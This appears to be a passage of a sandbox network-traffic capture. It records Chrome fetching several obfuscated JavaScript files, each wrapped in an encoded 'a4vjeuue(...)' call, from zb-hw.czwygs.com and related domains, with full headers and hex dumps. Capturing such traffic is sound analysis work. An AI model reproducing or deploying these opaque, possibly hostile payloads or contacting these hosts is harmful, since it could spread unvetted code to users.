                                                                                                                                                          2024-06-09 22:41:06 UTC641INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:05 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1860
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:59:00 GMT
                                                                                                                                                          ETag: "6645cad4-744"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,1],EU-GER-frankfurt-GLOBAL1-CACHE5[295],EU-GER-frankfurt-GLOBAL1-CACHE8[292,TCP_MISS,294],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 114443dc4e73e1c85a39ff294541d6ed
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823384
                                                                                                                                                          X-CCDN-Expires: 768616
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:06 UTC1860INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 45 34 42 64 41 47 67 47 38 41 52 53 67 4a 51 45 55 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 7a 56 4a 43 6b 4f 41 53 6e 49 41 69 46 6b 68 41 41 43 4a 42 77 42 4f 58 54 6d 49 44 63 41 65 54 41 41 72 45 4a 77 42 30 41 45 78 42 4d 75 61 45 41 41 56 35 4b 43 43 48 6b 63 41 6e 70 6b 46 69 41 2b 73 35 42 49 41 73 69 6e 30 73 41 4e 69 44 45 4b 41 44 63 6f 58 78 59 51 42 67 42 43 41 41 59 41 58 32 45 56 45 50 6c 70 4c 67 42 65 44 6b 77 78 53 6e 30 41 44 6d 41 78 59 56 4a 35 64 4e 30 30 54 43 35 43 6c 6e 54 4d 36 4a 67 49 4a 67 4c 53 58 32 71 78 41 44 6b 41 54 51 41 50 4e 55 61 55 56 4d 78 35 54 47 46 4d 63 6c 6a 53 44 57 31 4f 54 46 39
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgE4BdAGgG8ARSgJQEUAuAMwFc0YAXAS3UzVJCkOASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EVEPlpLgBeDkwxSn0ADmAxYVJ5dN00TC5ClnTM6JgIJgLSX2qxADkATQAPNUaUVMx5TGFMcljSDW1OTF9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          279192.168.2.55003490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC551OUTGET /pc/240516-03/static/js/components/slides.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:06 UTC643INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:06 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 57212
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:57 GMT
                                                                                                                                                          ETag: "6645cad1-df7c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE4[632],EU-GER-frankfurt-GLOBAL1-CACHE2[551,TCP_MISS,630],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6c7de8052f59e10dc5926e983c1515e6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1630716
                                                                                                                                                          X-CCDN-Expires: 961284
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:06 UTC15741INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 46 59 42 64 41 47 67 47 38 42 42 41 4d 79 51 45 59 41 75 61 67 56 7a 52 67 42 63 42 4c 64 54 64 30 7a 67 4a 54 6b 41 76 71 51 44 6d 41 52 7a 67 41 76 4a 71 77 37 63 30 76 66 71 53 52 43 41 62 6c 41 42 4f 41 41 68 43 6b 30 70 46 41 47 34 41 68 43 7a 5a 63 65 55 49 51 43 4a 6d 53 45 44 71 54 73 74 6e 44 72 65 4e 6f 41 76 4e 69 53 5a 62 41 41 5a 4f 41 41 55 41 43 31 73 42 4d 6e 55 55 54 67 41 54 48 55 44 76 5a 4d 77 55 62 31 73 4c 42 58 52 62 5a 50 59 41 54 77 67 51 46 47 70 4d 45 47 38 62 41 48 34 51 41 44 6f 6f 43 41 67 41 47 7a 7a 4d 54 67 4d 42 42 68 41 42 41 42 38 75 33 6d 71 51 41 41 38 49 46 43 31 32 4a 47 38 55 41 57 46 4d 54
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgFYBdAGgG8BBAMyQEYAuagVzRgBcBLdTd0zgJTkAvqQDmARzgAvJqw7c0vfqSRCAblABOAAhCk0pFAG4AhCzZceUIQCJmSEDqTstnDreNoAvNiSZbAAZOAAUAC1sBMnUUTgATHUDvZMwUb1sLBXRbZPYATwgQFGpMEG8bAH4QADooCAgAGzzMTgMBBhABAB8u3mqQAA8IFC12JG8UAWFMT
                                                                                                                                                          2024-06-09 22:41:06 UTC16384INData Raw: 76 75 4f 78 62 39 4e 2f 71 6f 62 48 4e 54 6d 51 7a 4d 53 69 49 4e 4d 62 65 72 63 4c 4d 57 6b 7a 6d 4d 79 46 6d 50 43 64 6c 6a 6b 4e 71 72 6d 5a 44 48 70 4a 7a 64 55 36 63 38 30 4c 6e 4e 74 43 37 64 72 73 34 32 53 43 31 58 4d 31 48 72 6a 47 35 75 63 79 36 64 34 61 5a 78 61 49 41 6a 5a 7a 4e 38 6d 45 5a 33 46 43 67 69 6d 53 72 78 49 33 63 68 65 58 63 76 6f 63 48 68 6e 61 37 49 64 50 30 79 64 52 61 4a 2b 6e 34 36 4b 46 6a 4f 70 77 56 75 53 5a 34 48 4e 72 66 71 38 33 67 4e 4d 4f 79 4c 46 30 34 41 7a 75 67 58 4c 35 6d 4c 38 4b 4f 47 45 49 58 47 31 2b 6b 6d 71 6f 71 78 39 56 67 6f 38 2b 57 67 66 36 52 6b 58 6f 79 4b 74 36 75 59 73 5a 69 6f 7a 35 44 41 45 70 46 57 4a 44 75 6e 31 35 34 6a 63 4d 2f 48 7a 30 53 4d 69 72 73 4f 66 57 45 44 6a 76 46 6a 39 6c 70 53 48
                                                                                                                                                          Data Ascii: vuOxb9N/qobHNTmQzMSiINMbercLMWkzmMyFmPCdljkNqrmZDHpJzdU6c80LnNtC7drs42SC1XM1HrjG5ucy6d4aZxaIAjZzN8mEZ3FCgimSrxI3cheXcvocHhna7IdP0ydRaJ+n46KFjOpwVuSZ4HNrfq83gNMOyLF04AzugXL5mL8KOGEIXG1+kmqoqx9Vgo8+Wgf6RkXoyKt6uYsZioz5DAEpFWJDun154jcM/Hz0SMirsOfWEDjvFj9lpSH
                                                                                                                                                          2024-06-09 22:41:06 UTC16384INData Raw: 64 44 51 39 46 38 67 77 71 58 63 48 5a 75 32 79 59 54 4e 44 78 64 4b 58 76 64 4b 78 64 43 51 6a 42 67 30 44 79 58 76 6b 57 4a 63 39 30 31 6c 36 42 69 32 58 36 67 48 6d 42 75 31 30 34 56 2b 44 45 6a 49 55 41 39 77 50 34 35 4d 46 2f 6a 7a 78 38 30 32 32 66 68 31 65 7a 57 51 73 54 5a 6f 67 4a 6e 4c 66 49 71 32 6d 37 5a 2b 58 53 71 6b 39 5a 4a 72 46 7a 66 61 52 63 6e 42 78 77 6b 4d 74 32 4b 6a 68 2b 69 78 58 71 41 79 53 67 63 55 4d 46 50 4b 30 6c 79 4b 53 42 31 42 64 45 48 71 4d 68 7a 38 63 38 76 53 66 44 75 34 71 67 41 55 6a 70 58 48 36 41 68 32 78 58 6e 57 44 59 35 4a 58 31 44 4f 6a 68 34 6e 59 49 4e 47 6a 37 48 68 7a 43 7a 56 44 63 2f 63 74 66 34 45 49 69 57 47 2b 37 35 58 78 38 47 66 41 73 31 63 76 52 55 67 65 58 47 77 73 41 33 44 74 77 59 4e 75 4b 74 4e
                                                                                                                                                          Data Ascii: dDQ9F8gwqXcHZu2yYTNDxdKXvdKxdCQjBg0DyXvkWJc901l6Bi2X6gHmBu104V+DEjIUA9wP45MF/jzx8022fh1ezWQsTZogJnLfIq2m7Z+XSqk9ZJrFzfaRcnBxwkMt2Kjh+ixXqAySgcUMFPK0lyKSB1BdEHqMhz8c8vSfDu4qgAUjpXH6Ah2xXnWDY5JX1DOjh4nYINGj7HhzCzVDc/ctf4EIiWG+75Xx8GfAs1cvRUgeXGwsA3DtwYNuKtN
                                                                                                                                                          2024-06-09 22:41:06 UTC8703INData Raw: 4e 4b 5a 4d 47 6e 38 70 63 73 76 61 6c 5a 45 75 4f 4a 39 64 31 43 70 2f 6b 4e 5a 35 34 6b 4c 4f 4a 52 48 51 47 6c 34 55 4b 47 6c 4e 6d 6d 31 6c 75 73 74 58 78 4e 36 4b 30 46 62 5a 4f 44 32 66 64 4e 76 6c 56 56 4a 30 2b 4e 73 6f 68 4a 51 6b 53 58 36 34 46 48 64 52 37 36 6c 58 41 4e 47 4c 71 35 6b 39 4d 55 5a 6a 74 4d 74 59 4c 74 4f 33 77 77 33 49 33 46 4c 30 75 35 4a 53 31 4d 6b 4a 32 34 6f 46 4a 70 34 76 31 70 69 44 4a 67 38 2f 30 76 6d 61 66 58 4b 6b 2b 61 75 4f 49 70 4b 43 6f 59 41 61 43 72 2f 5a 54 44 79 56 4a 33 34 6f 41 4a 4f 4d 6f 59 70 2b 4d 70 67 35 68 4d 71 41 5a 2b 43 75 74 49 31 41 72 69 6c 50 74 49 70 6c 73 62 54 62 6c 55 49 4d 2f 35 48 33 4d 55 67 38 45 72 6d 41 6d 31 77 34 56 66 33 4f 37 5a 6f 50 54 42 35 4d 38 41 4d 52 6b 31 32 63 61 67 58
                                                                                                                                                          Data Ascii: NKZMGn8pcsvalZEuOJ9d1Cp/kNZ54kLOJRHQGl4UKGlNmm1lustXxN6K0FbZOD2fdNvlVVJ0+NsohJQkSX64FHdR76lXANGLq5k9MUZjtMtYLtO3ww3I3FL0u5JS1MkJ24oFJp4v1piDJg8/0vmafXKk+auOIpKCoYAaCr/ZTDyVJ34oAJOMoYp+Mpg5hMqAZ+CutI1ArilPtIplsbTblUIM/5H3MUg8ErmAm1w4Vf3O7ZoPTB5M8AMRk12cagX


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          280192.168.2.55003690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC553OUTGET /pc/240516-03/static/js/components/367/news.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:06 UTC643INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:06 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 732
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:21 GMT
                                                                                                                                                          ETag: "6645caad-2dc"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[4],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE14[299],EU-GER-frankfurt-GLOBAL1-CACHE10[292,TCP_MISS,293],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 37bf4e928ce68d9d6fce27478b6c5428
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1121437
                                                                                                                                                          X-CCDN-Expires: 1470563
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:06 UTC732INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 72 41 42 67 47 59 42 64 41 47 67 47 38 41 69 41 61 67 43 30 42 7a 41 52 6b 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 68 36 6b 30 41 53 6e 49 42 66 55 67 42 4e 38 30 36 65 79 36 38 42 61 49 53 4e 49 68 78 6c 44 6b 68 41 41 43 4a 44 77 42 4f 66 58 70 51 44 63 41 65 54 41 41 72 45 4c 77 42 30 30 6b 47 7a 35 6f 51 41 42 53 4d 6f 49 49 49 7a 77 42 50 54 44 52 53 53 67 42 39 4d 4a 41 6b 41 46 6b 55 61 51 34 41 47 78 42 4b 43 67 41 33 4b 41 53 4f 45 42 59 41 51 6e 77 4a 55 58 4e 30 6f 77 4d 41 58 6e 49 30 4b 41 42 62 62 4d 70 33 59 43 51 55 6d 42 51 71 69 48 51 51 4e 42 34 6b 46 6e 4a 6d 31 6f 41 35 45 41 62 46 62 6e 35 42 63 53 4d 51 48 67 34
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtArABgGYBdAGgG8AiAagC0BzARkoC4AzAVzRgBcBLdJh6k0ASnIBfUgBN806ey68BaISNIhxlDkhAACJDwBOfXpQDcAeTAArELwB00kGz5oQABSMoIIIzwBPTDRSSgB9MJAkAFkUaQ4AGxBKCgA3KASOEBYAQnwJUXN0owMAXnI0KABbbMp3YCQUmBQqiHQQNB4kFnJm1oA5EAbFbn5BcSMQHg4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          281192.168.2.55003590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC555OUTGET /pc/240516-03/static/js/components/qrCodeHome.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:06 UTC639INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:06 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 4096
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:56 GMT
                                                                                                                                                          ETag: "6645cad0-1000"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE4[31],EU-GER-frankfurt-GLOBAL1-CACHE14[0,TCP_HIT,29],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1289101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 653b85f71978b839cf4b13cf6d5eb5e7
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1302899
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:06 UTC4096INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 54 67 47 59 42 64 41 47 67 47 38 41 68 41 54 51 45 6b 42 4c 41 4c 67 44 4d 42 58 4e 47 41 46 33 76 55 78 46 4a 53 6c 4f 41 53 6e 49 41 69 56 6b 68 41 41 43 4a 4a 77 42 4f 39 4c 6d 49 44 63 41 65 54 41 41 72 45 46 77 42 30 41 45 78 44 4e 36 61 45 41 41 56 35 4b 43 43 48 6d 63 41 6e 70 6b 46 69 41 2b 73 35 42 49 41 73 69 6e 32 73 41 4e 69 44 45 4b 41 44 63 6f 58 31 59 51 52 67 42 43 41 41 59 41 58 32 45 56 45 50 6c 70 65 67 42 65 54 6b 77 78 61 4a 67 49 5a 6a 46 68 55 69 52 55 38 6e 30 6f 54 69 67 57 64 69 34 65 4e 45 78 52 65 52 42 4f 56 6e 6b 30 63 67 42 48 65 51 42 68 62 78 41 41 43 52 51 41 57 77 69 78 51 50 74 72 52 6a 45 6f 43 41 68
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgGYBdAGgG8AhATQEkBLALgDMBXNGAF3vUxFJSlOASnIAiVkhAACJJwBO9LmIDcAeTAArEFwB0AExDN6aEAAV5KCCHmcAnpkFiA+s5BIAsin2sANiDEKADcoX1YQRgBCAAYAX2EVEPlpegBeTkwxaJgIZjFhUiRU8n0oTigWdi4eNExReRBOVnk0cgBHeQBhbxAACRQAWwixQPtrRjEoCAh


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          282192.168.2.55003790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC554OUTGET /pc/240516-03/static/js/components/noticeBox.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:06 UTC643INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:06 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 7648
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:54 GMT
                                                                                                                                                          ETag: "6645cace-1de0"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE2[350],EU-GER-frankfurt-GLOBAL1-CACHE10[346,TCP_MISS,349],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 1573b5b24cd0fe01a29189e67db4079a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823385
                                                                                                                                                          X-CCDN-Expires: 768615
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:06 UTC7648INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 44 67 42 59 41 61 51 67 5a 67 45 59 42 64 59 67 62 77 43 49 4b 41 32 58 46 65 67 4c 67 44 4d 42 58 4e 47 41 46 77 43 57 36 54 50 32 49 68 69 67 67 4a 53 31 2b 41 4f 68 41 41 50 43 43 67 42 4f 2f 4a 41 46 35 42 6d 65 6f 51 43 63 6e 41 4b 72 30 70 6d 43 68 53 6b 42 66 59 76 56 77 41 35 4d 41 48 6b 4f 50 50 6b 4a 46 69 51 4d 6d 2f 51 44 73 41 47 71 4b 41 41 71 75 76 41 4c 43 61 4b 4c 69 50 72 62 36 66 67 6a 36 59 65 36 52 30 52 4c 53 44 4e 78 49 49 41 41 45 53 50 79 71 67 67 4c 30 41 4e 78 4f 59 41 42 57 49 41 4a 79 41 43 59 67 6e 49 4a 6f 49 4d 47 71 4b 42 41 67 36 67 43 65 6d 42 4c 30 41 50 72 39 49 45 67 41 73 69 69 31 33 41 41 32 49 50
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgBYAaQgZgEYBdYgbwCIKA2XFegLgDMBXNGAFwCW6TP2IhiggJS1+AOhAAPCCgBO/JAF5BmeoQCcnAKr0pmChSkBfYvVwA5MAHkOPPkJFiQMm/QDsAGqKAAquvALCaKLiPrb6fgj6Ye6R0RLSDNxIIAAESPyqggL0ANxOYABWIAJyACYgnIJoIMGqKBAg6gCemBL0APr9IEgAsii13AA2IP


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          283192.168.2.55003890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC569OUTGET /pc/240516-03/static/js/components/367/views/home/indexList.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:06 UTC642INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:06 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1064
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:21 GMT
                                                                                                                                                          ETag: "6645caad-428"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE5[284],EU-GER-frankfurt-GLOBAL1-CACHE5[280,TCP_MISS,282],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 2340e61385ca051873d7d38b7526d618
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1121437
                                                                                                                                                          X-CCDN-Expires: 1470563
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:06 UTC1064INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 4c 41 64 6e 77 46 30 41 61 41 62 77 45 6b 41 7a 41 52 77 46 45 41 75 4b 67 56 7a 52 67 42 63 42 4c 64 54 64 6b 7a 67 4a 52 6b 41 76 69 51 42 65 41 52 67 6e 4d 6d 72 44 74 7a 53 39 2b 4a 4a 45 49 42 45 7a 4a 43 41 41 45 53 64 67 43 64 4f 48 4e 51 47 34 41 38 6d 41 42 57 49 44 67 44 6f 41 4a 69 43 71 63 30 49 41 41 72 36 55 45 45 50 76 59 42 50 54 45 34 53 4e 51 42 39 45 4a 41 6b 41 46 6b 55 65 32 59 41 47 78 41 31 63 67 41 33 4b 44 6a 6d 45 41 59 41 51 67 41 47 59 51 45 54 56 50 31 74 4e 41 42 65 4a 45 77 31 48 4a 67 49 4b 6a 55 42 45 68 42 53 73 68 67 55 41 46 73 49 64 42 41 30 64 69 51 47 45 52 4a 37 4b 48 59 6f 57 54 59 75 48 69 46 39 45 48
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALAdnwF0AaAbwEkAzARwFEAuKgVzRgBcBLdTdkzgJRkAviQBeARgnMmrDtzS9+JJEIBEzJCAAESdgCdOHNQG4A8mABWIDgDoAJiCqc0IAAr6UEEPvYBPTE4SNQB9EJAkAFkUe2YAGxA1cgA3KDjmEAYAQgAGYQETVP1tNABeJEw1HJgIKjUBEhBSshgUAFsIdBA0diQGERJ7KHYoWTYuHiF9EH


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          284192.168.2.55003913.32.99.1104434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC562OUTGET /ocs/zbw?r=9375188508 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
